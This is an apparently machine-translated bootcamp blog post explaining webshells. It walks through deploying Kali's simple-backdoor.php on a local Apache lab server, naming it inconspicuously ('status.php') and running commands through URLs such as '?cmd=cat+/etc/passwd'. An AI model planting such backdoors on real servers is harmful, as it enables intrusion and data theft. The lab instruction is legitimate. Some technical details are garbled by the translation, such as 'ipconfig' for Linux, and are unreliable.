27 julio, 2024

What is a webshell? | Bootcamps

¿Do you know what a webshell is? And what is it used for in cybersecurity?

Web pentesting is a branch of cybersecurity that focuses on hacking web applications. To do this, different techniques and tools are used, which are based on discovering and exploiting security flaws in the pages. These practices are some of the most demanded services in the field of computer security, due to the large number of web pages that currently exist and their high level of importance.

There are different methods to hack a web application. It all depends on the computer vulnerabilities found in its structure. Some common security flaws allow the theft of sensitive information or even the execution of code within the application.

In this post, we will talk about a web hacking tool that allows you to program and execute code in an application without the authorization of its administrators. The following content is made for educational purposes and its purpose is to help improve system security. Next, we will teach you What is a webshell and how is it used to simulate cyberattacks in web applications.

What is a webshell?

A webshell is a code capable of interpreting information from a web server, which allows an attacker to take control of it. In other words, is a small web application that allows tasks to be executed within the compromised site, just like a terminal in an operating system.

In system pentesting, a type of payloadcalled shellcode, which is used to remotely execute code on a vulnerable computer. A webshell is a similar system, which specializes in executing tasks in web applications. Thus, all kinds of malicious and sabotage actions can be carried out there.

The operating system for computer security researchers Kali Linux It has six webshell directories and fourteen tools of this type in total. To find them, install this operating system (preferably in a virtual machine) and go, from a console terminal, to the directory:

usr/share/webshells

In this directory you will find six folders with webshells for:

ASP (Activate Server Pages).
ASPX (ASP file extension).
CFM (CFML file extension, i.e. ColdFusion Markup Language).
JSP (Java Server Pages). Programming language perl. Programming language PHP.

What is a webshell for?

We have already seen what a webshell is and where to find this type of tools in a Kali Linux operating system. Now, We will see what the functions of a web pentesting application like this are:

Persistent access to the system. Upload and download files to the application. Theft of sensitive information from the application. Remote access to the page server. DDOS (denial of service) attacks.

How to run a webshell?

The first thing you should do to perform this exercise is create a virtual machine with Kali Linux operating system. To do this, you can select your software virtualization preferred. Some popular options are VMware, VirtualBox, and KVM.

After you have created your virtual machine, we can begin the installation process. how to run a webshell with Kali Linux.

Start the server

To start a server With the Kali system, use the command:

service apache2 start

If you don’t have it installed yetuse:

apt install apache 2

If the program asks you update itexecute:

apt update

Now, if you want to test that the server is working correctlyuse the command:

service apache2 status

Enter the server

The next step to execute our webshell is accessing the server from a browser. For it, Open your preferred browser and access the IP address of your Kali machine. If you don’t already know your IP address, you can find it out by running the following command in a terminal:

ipconfig

Select your webshell

By learning how to run a webshellyou will see that Kali Linux offers a variety of tools to attack different types of servers. Since Apache 2 uses the PHP programming language, for this example we will choose a webshell written in this language.

To see all the webshells available in Kali Linux, go to the directory:

usr/share/webshells

To see webshell options in PHPenter:

usr/share/webshells/php

To select the webshell simple.backdoor.phpwe will execute the command:

cat simple.backdoor.php

In this way, we will see the content of the source code of the webshellwhich is quite small. To use this webshellwe must access its domain, which will have the following structure:

****://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

To put this to work webshellwe must copy it to the Apache 2 server that we created. This will be found, by default, in the route «var/www/html«. To copy the webshell there, we will use the command:

cp simple-backdoor.php /var/www/html/webshell_name.php

For the name of the webshell, we can’t choose something obvious. To be more realistic, we recommend choosing a term with some subtlety, for example, «status.php«:

cp simple-backdoor.php /var/www/html/status.php

Run commands with the webshell

The last step of how to execute a webshell with Kali Linux is to send commands remotely to the application. To do this, from your browser, Access the Apache 2 server by entering your machine’s IP address in a browser. If, for example, the IP address of your Kali machine was 192.168.172.138, you would log into the server as an attacker as follows:

****://192.168.172.138

To run code remotely on the serveruses the following structure:

****://192.168.172.138/status.php?cmd=command

Replace the “command” value with any Linux command you want to run on the server, and In this way, you can use the webshell what you have created.

For example, to run the “ipconfig” commandin this example, we would enter the URL:

****://192.168.172.138/status.php?cmd=ipconfig

So, the server would give us information about your IP address.

More web pentesting tools

Learning what a webshell is and how to use it is essential for pentesting web applications, as they are often used in real cyberattacks. However, It is not the only attack technique used in this type of penetration tests..

Next, we will look at other web pentesting tools that you should add to your arsenal, as well as webshells:

Practice environments: some web applications have been intentionally designed with vulnerabilities, in order for pentesters to practice their skills. If you want to perfect your techniques, use webshells and thoroughly understand the main security flaws in web applications, use environments such as:

**** Proxy: man-in-the-middle cyber attacks man in the middle They are also usually quite common. To simulate them, there are applications called proxies ****, which allow you to intercept, modify, accept or reject each request/response made by a client/server. To understand in depth how these attacks work, this tool will be ideal.
netcat: It is a command line tool, that is, it is run from the operating system console. It comes pre-installed on Kali Linux and is run with the “nc” command. This tool allows you to connect to an **** server without having to use a browser and see all your interactions in RAW, that is, in HTML language..

How to learn more?

Now you know what a webshell is, what it is used for in web application pentesting and what other tools you should learn for this practice. If you want to learn more about web hackingenter our Cybersecurity Full Stack Bootcamp and become a specialist in less than 7 months. Learn in live classes with the best experts in the sector on topics such as pentesting, cryptography, analysis of malware and many others. Ask for more information and change your life!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *